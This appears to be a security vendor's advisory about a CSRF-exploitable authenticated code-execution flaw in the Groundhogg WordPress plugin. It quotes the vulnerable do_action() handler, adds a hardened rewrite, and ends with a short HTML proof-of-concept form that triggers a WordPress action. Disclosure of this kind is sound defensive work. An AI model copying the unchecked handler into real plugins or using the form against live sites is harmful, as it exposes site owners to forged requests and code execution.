Our Proactive Monitoring Caught an Authenticated Remote Code Execution (RCE) Vulnerability Being Introduced into Groundhogg
Occasionally our proactive monitoring of changes made to plugins in the Plugin Directory, which is intended to catch serious vulnerabilities, turns up an easy-to-confirm vulnerability. That was the case with an authenticated remote code execution (RCE) vulnerability being introduced into the plugin Groundhogg, which is also exploitable through cross-site request forgery (CSRF).
Since our Plugin Security Checker utilizes the same checks, it will alert you if plugins you use possibly contain the same type of vulnerable code (and other types of vulnerable code). From there, if you are a paying customer of our service you can suggest/vote for it to receive a security review that will check over that, or you can order the same type of review separately.
The Plugin Security Checker flags a number of other possible security vulnerabilities in the plugin, so if you use this plugin it would be a good idea to have it further reviewed.
The impacted code isn’t too hard to understand, as it passes the value of POST input “bulk_action” to the function do_action(), which executes “functions hooked on a specific action hook”:
```php
public function ajax_listener() {
    $bulk_action = $_POST[ 'bulk_action' ];
    do_action( $bulk_action );
}
```
Based on the name of the function it isn’t surprising that it is accessible through WordPress’ AJAX functionality:
```php
add_action( 'wp_ajax_bulk_action_listener', [ $this, 'ajax_listener' ] );
```
In this case it is accessible to anyone logged in to WordPress. Since the code in that function doesn’t check for a valid nonce, in addition to anyone logged in to WordPress being able to exploit it directly, an attacker could also cause someone who is logged in to exploit it without intending to (CSRF).
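As an added example (not code from Groundhogg or from the post's author), here is how the same AJAX listener could be written so that a forged request, an arbitrary hook name and an under-privileged user are all rejected; the nonce action name, the allowlisted hook names and the capabilities mapped to them are assumed placeholders.

```php
<?php
// Added example, not Groundhogg's code. Hardened version of the ajax_listener
// pattern shown in the post. 'example_bulk_action' (nonce action) and the
// allowlist entries below are assumed placeholders.

class Bulk_Action_Listener {

    // Only these hook names may ever reach do_action(), each tied to the
    // capability a caller must hold to trigger it.
    private $allowed_actions = [
        'example_bulk_delete' => 'delete_posts',
        'example_bulk_export' => 'export',
    ];

    public function __construct() {
        add_action( 'wp_ajax_bulk_action_listener', [ $this, 'ajax_listener' ] );
        // Hand the nonce to the page's script so legitimate requests can send it
        // as the 'nonce' POST field; 'example-bulk-js' is an assumed script handle.
        add_action( 'admin_enqueue_scripts', function () {
            wp_localize_script( 'example-bulk-js', 'exampleBulk', [
                'nonce' => wp_create_nonce( 'example_bulk_action' ),
            ] );
        } );
    }

    public function ajax_listener() {
        // 1. CSRF: refuse requests without a valid nonce for this action.
        //    check_ajax_referer() ends the request with -1 / HTTP 403 on failure.
        check_ajax_referer( 'example_bulk_action', 'nonce' );

        // 2. Input: accept only a sanitized hook name from POST.
        $bulk_action = isset( $_POST['bulk_action'] )
            ? sanitize_key( wp_unslash( $_POST['bulk_action'] ) )
            : '';

        // 3. Allowlist: user input must select from known hooks, never name one.
        if ( ! isset( $this->allowed_actions[ $bulk_action ] ) ) {
            wp_send_json_error( 'unknown bulk action', 400 );
        }

        // 4. Authorization: being logged in is not the same as being allowed.
        if ( ! current_user_can( $this->allowed_actions[ $bulk_action ] ) ) {
            wp_send_json_error( 'insufficient permissions', 403 );
        }

        do_action( $bulk_action );
        wp_send_json_success();
    }
}

new Bulk_Action_Listener();
```

With this in place the proof of concept form later in the post fails at step 1 (no nonce), and a logged-in user who obtains a nonce still cannot name an arbitrary hook such as do_feed_rss because it is not on the allowlist.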
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, since multiple previously fully disclosed vulnerabilities were quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriately is more important than what is best for the rest of the community.
Proof of Concept
The following proof of concept will cause the WordPress action/function do_feed_rss to run, when logged in to WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress.
```html
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=bulk_action_listener" method="POST">
<input type="hidden" name="bulk_action" value="do_feed_rss" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```
Is It Fixed?
If you are reading this post down the road, the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is test whether vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities but have failed to do so.